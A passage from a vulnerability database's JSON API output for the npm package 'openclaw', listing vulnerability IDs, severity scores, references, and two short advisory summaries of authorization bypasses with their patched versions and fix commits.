"VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "GHSA-8f9r-gr6r-x63q" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-te8f-snty-j7hh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89104?format=api", "vulnerability_id": "VCID-tf28-1z2z-5yfn", "summary": "OpenClaw: `/phone arm`/`/phone disarm` Bypasses `operator.admin` Scope Check for External Channels\n## Summary\n`/phone arm`/`/phone disarm` Bypasses `operator.admin` Scope Check for External Channels\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Maintainers accepted this issue, fixed it in aa66ae1fc797d3298cc409ed2c5da69a89950a45 on 2026-03-27, and that fix shipped in v2026.3.28, so normalize it as a fixed released draft rather than a close-by-trust-model call.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.24`\n- Patched versions: `>= 2026.3.28`\n- First stable tag containing the fix: `v2026.3.28`\n\n## Fix Commit(s)\n- `aa66ae1fc797d3298cc409ed2c5da69a89950a45` — 2026-03-27T20:35:42Z\n\n## Release Process Note\n- The fix is already present in released version `2026.3.28`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41375", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25193", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.2513", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25179", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41375" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-h2v7-xc88-xx8c", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:26:54Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-h2v7-xc88-xx8c" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/aa66ae1fc797d3298cc409ed2c5da69a89950a45", "reference_id": "aa66ae1fc797d3298cc409ed2c5da69a89950a45", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:26:54Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/aa66ae1fc797d3298cc409ed2c5da69a89950a45" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41375", "reference_id": "CVE-2026-41375", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41375" }, { "reference_url": "https://github.com/advisories/GHSA-h2v7-xc88-xx8c", "reference_id": "GHSA-h2v7-xc88-xx8c", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-h2v7-xc88-xx8c" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-phone-arm-and-phone-disarm-endpoints", "reference_id": "openclaw-authorization-bypass-in-phone-arm-and-phone-disarm-endpoints", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:26:54Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-phone-arm-and-phone-disarm-endpoints" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-41375", "GHSA-h2v7-xc88-xx8c" ], "risk_score": 3.2, "exploitability": "0.5", "weighted_severity": "6.4", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tf28-1z2z-5yfn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91270?format=api", "vulnerability_id": "VCID-tk9h-nqrz-uugp", "summary": "OpenClaw: Telegram DM-Scoped Inline Button Callbacks Bypass DM Pairing and Mutate Session State\n## Summary\n\nTelegram DM-Scoped Inline Button Callbacks Bypass DM Pairing and Mutate Session State\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nTelegram callback queries from direct messages previously used weaker callback-only authorization and could mutate session state without satisfying normal DM pairing. Commit `269282ac69ab6030d5f30d04822668f607f13065` enforces DM authorization for callbacks.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `269282ac69ab6030d5f30d04822668f607f13065`.\n\n## Fix Commit(s)\n\n- `269282ac69ab6030d5f30d04822668f607f13065`", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35661", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17545", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.175", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17539", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35661" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/269282ac69ab6030d5f30d04822668f607f13065", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:14:55Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/269282ac69ab6030d5f30d04822668f607f13065" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-j4c9-w69r-cw33", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:14:55Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-j4c9-w69r-cw33" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35661", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35661" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-telegram-dm-scoped-inline-button-callback-authorization-bypass", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:14:55Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-telegram-dm-scoped-inline-button-callback-authorization-bypass" }, { "reference_url": "https://github.com/advisories/GHSA-j4c9-w69r-cw33", "reference_id": "GHSA-j4c9-w69r-cw33", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-j4c9-w69r-cw33" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": 